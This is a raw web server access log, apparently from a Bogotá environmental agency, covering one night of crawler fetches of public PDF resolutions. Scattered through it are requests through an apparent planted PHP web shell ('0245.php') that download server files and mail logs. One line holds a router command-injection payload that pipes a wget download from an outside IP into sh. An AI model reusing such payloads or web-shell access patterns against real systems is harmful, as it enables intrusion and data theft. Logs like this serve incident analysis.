216.244.66.195 - - [23/Jun/2024:00:53:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3471.pdf HTTP/1.1" 200 336615
216.244.66.195 - - [23/Jun/2024:00:54:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3792.pdf HTTP/1.1" 200 367701
201.245.192.253 - - [23/Jun/2024:00:53:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:00:54:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3918.pdf HTTP/1.1" 200 258617
216.244.66.195 - - [23/Jun/2024:00:55:09 -0500] "GET /BLA/resoluciones/AUTOS%202007/0121.pdf HTTP/1.1" 200 44643
8.219.48.65 - - [23/Jun/2024:00:55:30 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [23/Jun/2024:00:55:37 -0500] "GET /BLA/resoluciones/AUTOS%202007/0168.pdf HTTP/1.1" 200 181540
139.180.154.152 - - [22/Jun/2024:23:15:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=0518.pdf&ft=download HTTP/1.1" 200 384679
216.244.66.195 - - [23/Jun/2024:00:56:03 -0500] "GET /BLA/resoluciones/AUTOS%202007/0175.pdf HTTP/1.1" 200 60104
139.180.129.127 - - [23/Jun/2024:00:55:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250&f=00000232.tif&ft=download HTTP/1.1" 200 177238
216.244.66.195 - - [23/Jun/2024:00:56:28 -0500] "GET /BLA/resoluciones/AUTOS%202007/0565.pdf HTTP/1.1" 200 132764
216.244.66.195 - - [23/Jun/2024:00:56:52 -0500] "GET /BLA/resoluciones/AUTOS%202007/0865.pdf HTTP/1.1" 200 459208
216.244.66.195 - - [23/Jun/2024:00:57:15 -0500] "GET /BLA/resoluciones/AUTOS%202007/0870.pdf HTTP/1.1" 200 29792
47.128.125.95 - - [23/Jun/2024:00:57:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150902-1716-495000.txt&ft=download&white=1 HTTP/1.1" 200 583
216.245.221.92 - - [23/Jun/2024:00:57:32 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:00:57:37 -0500] "GET /BLA/resoluciones/AUTOS%202007/0967.pdf HTTP/1.1" 200 469381
216.244.66.195 - - [23/Jun/2024:00:57:58 -0500] "GET /BLA/resoluciones/AUTOS%202007/1011.pdf HTTP/1.1" 200 120723
216.244.66.195 - - [23/Jun/2024:00:58:22 -0500] "GET /BLA/resoluciones/AUTOS%202007/1036.pdf HTTP/1.1" 200 30782
216.244.66.195 - - [23/Jun/2024:00:58:40 -0500] "GET /BLA/resoluciones/AUTOS%202007/1104.pdf HTTP/1.1" 200 25659
216.244.66.195 - - [23/Jun/2024:00:58:58 -0500] "GET /BLA/resoluciones/AUTOS%202007/1120.pdf HTTP/1.1" 200 80115
201.245.192.253 - - [23/Jun/2024:00:58:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:00:59:15 -0500] "GET /BLA/resoluciones/AUTOS%202007/1227.pdf HTTP/1.1" 200 86967
216.244.66.195 - - [23/Jun/2024:00:59:31 -0500] "GET /BLA/resoluciones/AUTOS%202007/1460.pdf HTTP/1.1" 200 26948
216.244.66.195 - - [23/Jun/2024:00:59:46 -0500] "GET /BLA/resoluciones/AUTOS%202007/1514.pdf HTTP/1.1" 200 195335
157.230.246.216 - - [23/Jun/2024:00:59:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=post-formats.php&ft=download HTTP/1.1" 200 6513
216.244.66.195 - - [23/Jun/2024:01:00:04 -0500] "GET /BLA/resoluciones/AUTOS%202007/1609.pdf HTTP/1.1" 200 29123
216.244.66.195 - - [23/Jun/2024:01:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202007/1822.pdf HTTP/1.1" 200 31355
157.55.39.49 - - [23/Jun/2024:01:00:22 -0500] "GET /Publicaciones/2024EE45209.pdf HTTP/1.1" 404 227
216.244.66.195 - - [23/Jun/2024:01:00:30 -0500] "GET /BLA/resoluciones/AUTOS%202009/0994.pdf HTTP/1.1" 200 183670
216.244.66.195 - - [23/Jun/2024:01:00:41 -0500] "GET /BLA/resoluciones/AUTOS%202009/1118.pdf HTTP/1.1" 200 77739
216.244.66.195 - - [23/Jun/2024:01:00:50 -0500] "GET /BLA/resoluciones/AUTOS%202009/1218.pdf HTTP/1.1" 200 123853
216.244.66.195 - - [23/Jun/2024:01:00:59 -0500] "GET /BLA/resoluciones/AUTOS%202009/1691.pdf HTTP/1.1" 200 124668
216.244.66.195 - - [23/Jun/2024:01:01:07 -0500] "GET /BLA/resoluciones/AUTOS%202009/1910.pdf HTTP/1.1" 200 104672
216.244.66.195 - - [23/Jun/2024:01:01:16 -0500] "GET /BLA/resoluciones/AUTOS%202009/2115.pdf HTTP/1.1" 200 87326
216.244.66.195 - - [23/Jun/2024:01:01:22 -0500] "GET /BLA/resoluciones/AUTOS%202009/2226.pdf HTTP/1.1" 200 122230
216.244.66.195 - - [23/Jun/2024:01:01:27 -0500] "GET /BLA/resoluciones/AUTOS%202009/2441.pdf HTTP/1.1" 200 100337
47.128.122.194 - - [23/Jun/2024:01:01:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150904-0030-993000.txt&ft=download&white=1 HTTP/1.1" 200 661
216.244.66.195 - - [23/Jun/2024:01:01:32 -0500] "GET /BLA/resoluciones/AUTOS%202009/2569.pdf HTTP/1.1" 200 99450
216.244.66.195 - - [23/Jun/2024:01:01:36 -0500] "GET /BLA/resoluciones/AUTOS%202009/2623.pdf HTTP/1.1" 200 91402
216.244.66.195 - - [23/Jun/2024:01:01:39 -0500] "GET /BLA/resoluciones/AUTOS%202011/0073.pdf HTTP/1.1" 200 416549
216.244.66.195 - - [23/Jun/2024:01:01:42 -0500] "GET /BLA/resoluciones/AUTOS%202011/0636.pdf HTTP/1.1" 200 186023
216.244.66.195 - - [23/Jun/2024:01:01:45 -0500] "GET /BLA/resoluciones/AUTOS%202011/0737.pdf HTTP/1.1" 200 162215
216.244.66.195 - - [23/Jun/2024:01:01:48 -0500] "GET /BLA/resoluciones/AUTOS%202011/0868.pdf HTTP/1.1" 200 267953
216.244.66.195 - - [23/Jun/2024:01:01:50 -0500] "GET /BLA/resoluciones/AUTOS%202011/0880.pdf HTTP/1.1" 200 153717
216.244.66.195 - - [23/Jun/2024:01:01:52 -0500] "GET /BLA/resoluciones/AUTOS%202011/1348.pdf HTTP/1.1" 200 212933
216.244.66.195 - - [23/Jun/2024:01:01:54 -0500] "GET /BLA/resoluciones/AUTOS%202011/1372.pdf HTTP/1.1" 200 227640
216.244.66.195 - - [23/Jun/2024:01:01:56 -0500] "GET /BLA/resoluciones/AUTOS%202011/1577.pdf HTTP/1.1" 200 96510
216.244.66.195 - - [23/Jun/2024:01:01:58 -0500] "GET /BLA/resoluciones/AUTOS%202011/1738.pdf HTTP/1.1" 200 248200
216.244.66.195 - - [23/Jun/2024:01:02:00 -0500] "GET /BLA/resoluciones/AUTOS%202011/1814.pdf HTTP/1.1" 200 154609
216.244.66.195 - - [23/Jun/2024:01:02:09 -0500] "GET /BLA/resoluciones/AUTOS%202011/2062.pdf HTTP/1.1" 200 112327
216.244.66.195 - - [23/Jun/2024:01:02:19 -0500] "GET /BLA/resoluciones/AUTOS%202011/2751.pdf HTTP/1.1" 200 185824
173.252.83.11 - - [23/Jun/2024:01:02:24 -0500] "GET /distrito-inicia-pavimentacion-de-vias-para-mejorar-la-calidad-del-aire-de-bogota.html HTTP/1.1" 200 970
173.252.83.22 - - [23/Jun/2024:01:02:24 -0500] "GET /distrito-inicia-pavimentacion-de-vias-para-mejorar-la-calidad-del-aire-de-bogota.html HTTP/1.1" 200 970
173.252.83.19 - - [23/Jun/2024:01:02:30 -0500] "GET /secretaria-de-ambiente-impone-medidas-preventivas-a-un-privado-que-utilizaba-un-area-protegida-para-promocionar-proyectos.html HTTP/1.1" 200 866
173.252.83.115 - - [23/Jun/2024:01:02:30 -0500] "GET /secretaria-de-ambiente-impone-medidas-preventivas-a-un-privado-que-utilizaba-un-area-protegida-para-promocionar-proyectos.html HTTP/1.1" 200 866
216.245.221.92 - - [23/Jun/2024:01:02:32 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:01:02:37 -0500] "GET /BLA/resoluciones/AUTOS%202011/2814.pdf HTTP/1.1" 200 311435
216.244.66.195 - - [23/Jun/2024:01:02:53 -0500] "GET /BLA/resoluciones/AUTOS%202011/2985.pdf HTTP/1.1" 200 160600
216.244.66.195 - - [23/Jun/2024:01:03:08 -0500] "GET /BLA/resoluciones/AUTOS%202011/3060.pdf HTTP/1.1" 200 97859
66.249.66.20 - - [23/Jun/2024:01:03:08 -0500] "GET /BLA/boletinlegal/Circulares/2024/CIRCULAR%20No.%2000001%20DEL%2011%20DE%20ENERO%20DEL%202024.pdf HTTP/1.1" 200 298890
216.244.66.195 - - [23/Jun/2024:01:03:24 -0500] "GET /BLA/resoluciones/AUTOS%202011/3094.pdf HTTP/1.1" 200 188107
216.244.66.195 - - [23/Jun/2024:01:03:37 -0500] "GET /BLA/resoluciones/AUTOS%202011/3231.pdf HTTP/1.1" 200 342142
216.244.66.195 - - [23/Jun/2024:01:03:49 -0500] "GET /BLA/resoluciones/AUTOS%202011/3687.pdf HTTP/1.1" 200 195775
68.183.227.193 - - [23/Jun/2024:01:03:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2&f=db_printview.php&ft=download HTTP/1.1" 200 5269
201.245.192.253 - - [23/Jun/2024:01:03:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:01:04:08 -0500] "GET /BLA/resoluciones/AUTOS%202013/0290.pdf HTTP/1.1" 200 1066800
216.244.66.195 - - [23/Jun/2024:01:04:22 -0500] "GET /BLA/resoluciones/AUTOS%202013/0469.pdf HTTP/1.1" 200 1035517
216.244.66.195 - - [23/Jun/2024:01:04:37 -0500] "GET /BLA/resoluciones/AUTOS%202013/0658.pdf HTTP/1.1" 200 1264860
216.244.66.195 - - [23/Jun/2024:01:04:50 -0500] "GET /BLA/resoluciones/AUTOS%202019/0681.pdf HTTP/1.1" 200 260460
216.244.66.195 - - [23/Jun/2024:01:05:01 -0500] "GET /BLA/resoluciones/AUTOS%202019/1500.pdf HTTP/1.1" 200 262862
216.244.66.195 - - [23/Jun/2024:01:05:13 -0500] "GET /BLA/resoluciones/AUTOS%202019/3031.pdf HTTP/1.1" 200 228461
216.244.66.195 - - [23/Jun/2024:01:05:21 -0500] "GET /BLA/resoluciones/AUTOS%202019/3195.pdf HTTP/1.1" 200 274688
216.244.66.195 - - [23/Jun/2024:01:05:32 -0500] "GET /BLA/resoluciones/AUTOS%202019/3717.pdf HTTP/1.1" 200 333145
47.128.112.143 - - [23/Jun/2024:01:05:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+101-150&f=00000136.tif&ft=download HTTP/1.1" 200 20132
216.244.66.195 - - [23/Jun/2024:01:05:40 -0500] "GET /BLA/resoluciones/AUTOS%202019/3762.pdf HTTP/1.1" 200 339884
216.244.66.195 - - [23/Jun/2024:01:05:47 -0500] "GET /BLA/resoluciones/AUTOS%202019/4172.pdf HTTP/1.1" 200 282407
216.244.66.195 - - [23/Jun/2024:01:05:53 -0500] "GET /BLA/resoluciones/AUTOS%202019/4204.pdf HTTP/1.1" 200 233970
216.244.66.195 - - [23/Jun/2024:01:05:58 -0500] "GET /BLA/resoluciones/AUTOS%202023/0263.pdf HTTP/1.1" 200 387345
216.244.66.195 - - [23/Jun/2024:01:06:02 -0500] "GET /BLA/resoluciones/AUTOS%202023/0750.pdf HTTP/1.1" 200 371199
216.244.66.195 - - [23/Jun/2024:01:06:06 -0500] "GET /BLA/resoluciones/AUTOS%202023/0770.pdf HTTP/1.1" 200 408648
216.244.66.195 - - [23/Jun/2024:01:06:13 -0500] "GET /BLA/resoluciones/AUTOS%202023/0894.pdf HTTP/1.1" 200 398184
216.244.66.195 - - [23/Jun/2024:01:06:34 -0500] "GET /BLA/resoluciones/AUTOS%202023/0947.pdf HTTP/1.1" 200 494229
216.244.66.195 - - [23/Jun/2024:01:06:57 -0500] "GET /BLA/resoluciones/AUTOS%202023/0958.pdf HTTP/1.1" 200 472914
216.244.66.195 - - [23/Jun/2024:01:07:15 -0500] "GET /BLA/resoluciones/AUTOS%202023/1083.pdf HTTP/1.1" 200 398757
216.245.221.92 - - [23/Jun/2024:01:07:32 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:01:07:32 -0500] "GET /BLA/resoluciones/AUTOS%202023/1680.pdf HTTP/1.1" 200 419161
216.244.66.195 - - [23/Jun/2024:01:07:48 -0500] "GET /BLA/resoluciones/AUTOS%202023/1910.pdf HTTP/1.1" 200 407314
149.28.152.164 - - [23/Jun/2024:01:07:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput&f=mail-20150905-2111-952000.txt&ft=download HTTP/1.1" 200 631
216.244.66.195 - - [23/Jun/2024:01:08:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/4145.pdf HTTP/1.1" 200 420059
23.22.35.162 - - [23/Jun/2024:01:08:02 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202021/&order=asc&sort=date HTTP/1.1" 200 399696
3.224.220.101 - - [23/Jun/2024:01:08:07 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202021/&order=asc&sort=size HTTP/1.1" 200 399696
52.70.240.171 - - [23/Jun/2024:01:08:10 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202021/&order=desc&sort=name HTTP/1.1" 200 399695
52.70.240.171 - - [23/Jun/2024:01:08:15 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202021/&order=desc&sort=size HTTP/1.1" 200 399695
23.22.35.162 - - [23/Jun/2024:01:08:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202021/&order=desc&sort=date HTTP/1.1" 200 399695
216.244.66.195 - - [23/Jun/2024:01:08:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3154.pdf HTTP/1.1" 200 286874
3.224.220.101 - - [23/Jun/2024:01:08:22 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202021/&order=asc&sort=name HTTP/1.1" 200 399696
23.22.35.162 - - [23/Jun/2024:01:08:26 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202020/&order=asc&sort=date HTTP/1.1" 200 333353
52.70.240.171 - - [23/Jun/2024:01:08:30 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202020/&order=asc&sort=size HTTP/1.1" 200 333353
216.244.66.195 - - [23/Jun/2024:01:08:33 -0500] "GET /BLA/resoluciones/AUTOS%202014/2947.pdf HTTP/1.1" 200 702778
23.22.35.162 - - [23/Jun/2024:01:08:34 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202020/&order=desc&sort=name HTTP/1.1" 200 333352
3.224.220.101 - - [23/Jun/2024:01:08:39 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202020/&order=desc&sort=size HTTP/1.1" 200 333352
52.70.240.171 - - [23/Jun/2024:01:08:42 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202020/&order=desc&sort=date HTTP/1.1" 200 333352
216.244.66.195 - - [23/Jun/2024:01:08:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/02369.pdf HTTP/1.1" 200 270048
52.70.240.171 - - [23/Jun/2024:01:08:47 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202020/&order=asc&sort=name HTTP/1.1" 200 333353
52.70.240.171 - - [23/Jun/2024:01:08:50 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202022/&order=asc&sort=date HTTP/1.1" 200 513755
23.22.35.162 - - [23/Jun/2024:01:08:55 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202022/&order=asc&sort=size HTTP/1.1" 200 513755
3.224.220.101 - - [23/Jun/2024:01:08:59 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202022/&order=desc&sort=name HTTP/1.1" 200 513754
201.245.192.253 - - [23/Jun/2024:01:08:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
23.22.35.162 - - [23/Jun/2024:01:09:02 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202023/&order=asc&sort=date HTTP/1.1" 200 574628
3.224.220.101 - - [23/Jun/2024:01:09:06 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202022/&order=desc&sort=size HTTP/1.1" 200 513754
3.224.220.101 - - [23/Jun/2024:01:09:10 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202022/&order=desc&sort=date HTTP/1.1" 200 513754
3.224.220.101 - - [23/Jun/2024:01:09:14 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202022/&order=asc&sort=name HTTP/1.1" 200 513755
52.70.240.171 - - [23/Jun/2024:01:09:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202023/&order=asc&sort=size HTTP/1.1" 200 574628
3.224.220.101 - - [23/Jun/2024:01:09:22 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202023/&order=desc&sort=name HTTP/1.1" 200 574627
3.224.220.101 - - [23/Jun/2024:01:09:26 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202023/&order=desc&sort=size HTTP/1.1" 200 574627
52.70.240.171 - - [23/Jun/2024:01:09:30 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202023/&order=desc&sort=date HTTP/1.1" 200 574627
52.70.240.171 - - [23/Jun/2024:01:09:34 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202023/&order=asc&sort=name HTTP/1.1" 200 574628
3.224.220.101 - - [23/Jun/2024:01:09:38 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202024/&order=asc&sort=date HTTP/1.1" 200 18253
23.22.35.162 - - [23/Jun/2024:01:09:42 -0500] "GET /BLA/resoluciones/AUTOS%202024/01966.pdf HTTP/1.1" 200 322054
23.22.35.162 - - [23/Jun/2024:01:09:47 -0500] "GET /BLA/resoluciones/AUTOS%202024/02309.pdf HTTP/1.1" 200 421894
47.128.122.219 - - [23/Jun/2024:01:09:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+701-750&f=00000715.tif&ft=download HTTP/1.1" 200 131064
52.70.240.171 - - [23/Jun/2024:01:09:51 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202024/&order=desc&sort=date HTTP/1.1" 200 18252
52.70.240.171 - - [23/Jun/2024:01:09:55 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202024/&order=asc&sort=name HTTP/1.1" 200 18253
3.224.220.101 - - [23/Jun/2024:01:09:58 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202024/&order=asc&sort=size HTTP/1.1" 200 18253
3.224.220.101 - - [23/Jun/2024:01:10:03 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202024/&order=desc&sort=size HTTP/1.1" 200 18252
52.70.240.171 - - [23/Jun/2024:01:10:06 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202024/&order=desc&sort=name HTTP/1.1" 200 18252
66.249.66.21 - - [23/Jun/2024:01:10:54 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5561.pdf HTTP/1.1" 304 -
139.180.136.106 - - [23/Jun/2024:01:11:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin&f=plugin-editor.php&ft=download HTTP/1.1" 200 11532
216.245.221.92 - - [23/Jun/2024:01:12:32 -0500] "HEAD / HTTP/1.1" 200 -
18.190.217.231 - - [23/Jun/2024:01:12:34 -0500] "GET /robots.txt HTTP/1.1" 404 1018
18.190.217.231 - - [23/Jun/2024:01:12:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1605.pdf&ft=phpsess&white=1 HTTP/1.1" 200 3937
47.128.27.4 - - [23/Jun/2024:01:13:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages&f=page26.swf&ft=download HTTP/1.1" 200 20133
201.245.192.253 - - [23/Jun/2024:01:13:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
167.99.79.53 - - [23/Jun/2024:01:15:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo&f=readme_en.txt&ft=download HTTP/1.1" 200 7930
157.55.39.12 - - [23/Jun/2024:01:16:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7605.pdf HTTP/1.1" 304 -
216.245.221.92 - - [23/Jun/2024:01:17:32 -0500] "HEAD / HTTP/1.1" 200 -
52.15.162.24 - - [23/Jun/2024:01:17:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6745.pdf&ft=download&white=1 HTTP/1.1" 200 375106
201.245.192.253 - - [23/Jun/2024:01:17:40 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:01:18:01 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
47.128.51.254 - - [23/Jun/2024:01:18:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2273.pdf&ft=download HTTP/1.1" 200 339623
201.245.192.253 - - [23/Jun/2024:01:18:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:01:19:01 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [23/Jun/2024:01:19:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:01:20:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
40.77.167.22 - - [23/Jun/2024:01:20:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1994.pdf HTTP/1.1" 200 660855
139.180.129.127 - - [23/Jun/2024:01:20:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2&f=RELEASE-DATE-4.2.7.1&ft=download HTTP/1.1" 200 29
185.191.127.212 - - [23/Jun/2024:01:21:20 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
3.135.199.74 - - [23/Jun/2024:01:21:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6745.pdf&ft=download HTTP/1.1" 200 375106
47.128.111.186 - - [23/Jun/2024:01:22:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=media.php&ft=download&white=1 HTTP/1.1" 200 118400
216.245.221.92 - - [23/Jun/2024:01:22:32 -0500] "HEAD / HTTP/1.1" 200 -
149.50.103.48 - - [23/Jun/2024:01:23:00 -0500] "GET / HTTP/1.1" 200 319
66.249.66.20 - - [23/Jun/2024:01:23:07 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5725.pdf HTTP/1.1" 304 -
201.245.192.253 - - [23/Jun/2024:01:23:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
157.90.244.54 - - [23/Jun/2024:01:25:46 -0500] "GET / HTTP/1.1" 200 4720
162.55.43.55 - - [23/Jun/2024:01:26:14 -0500] "GET / HTTP/1.1" 200 4720
3.133.154.63 - - [23/Jun/2024:01:26:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1605.pdf&ft=ini HTTP/1.1" 200 3013
47.128.96.156 - - [23/Jun/2024:01:26:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=getexcel.php&ft=download&white=1 HTTP/1.1" 200 435
216.245.221.92 - - [23/Jun/2024:01:27:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jun/2024:01:27:40 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:01:28:01 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
188.166.211.115 - - [23/Jun/2024:01:28:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1151-1200&f=00001196.tif HTTP/1.1" 200 17697
149.28.152.164 - - [23/Jun/2024:01:28:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_tif HTTP/1.1" 200 175
207.148.79.140 - - [23/Jun/2024:01:28:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
178.128.105.15 - - [23/Jun/2024:01:28:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
178.128.105.15 - - [23/Jun/2024:01:28:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
207.148.79.140 - - [23/Jun/2024:01:28:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
188.166.211.115 - - [23/Jun/2024:01:28:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
178.128.105.15 - - [23/Jun/2024:01:28:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
178.128.105.15 - - [23/Jun/2024:01:28:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
139.180.189.170 - - [23/Jun/2024:01:28:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
149.28.152.164 - - [23/Jun/2024:01:28:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
201.245.192.253 - - [23/Jun/2024:01:28:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
3.144.39.141 - - [23/Jun/2024:01:29:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6745.pdf&ft=sdb HTTP/1.1" 200 3014
152.61.128.50 - - [23/Jun/2024:01:29:13 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [23/Jun/2024:01:29:14 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [23/Jun/2024:01:29:14 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:01:29:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:01:30:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
3.146.221.246 - - [23/Jun/2024:01:30:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=3&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4447.pdf&ft=info HTTP/1.1" 200 362845
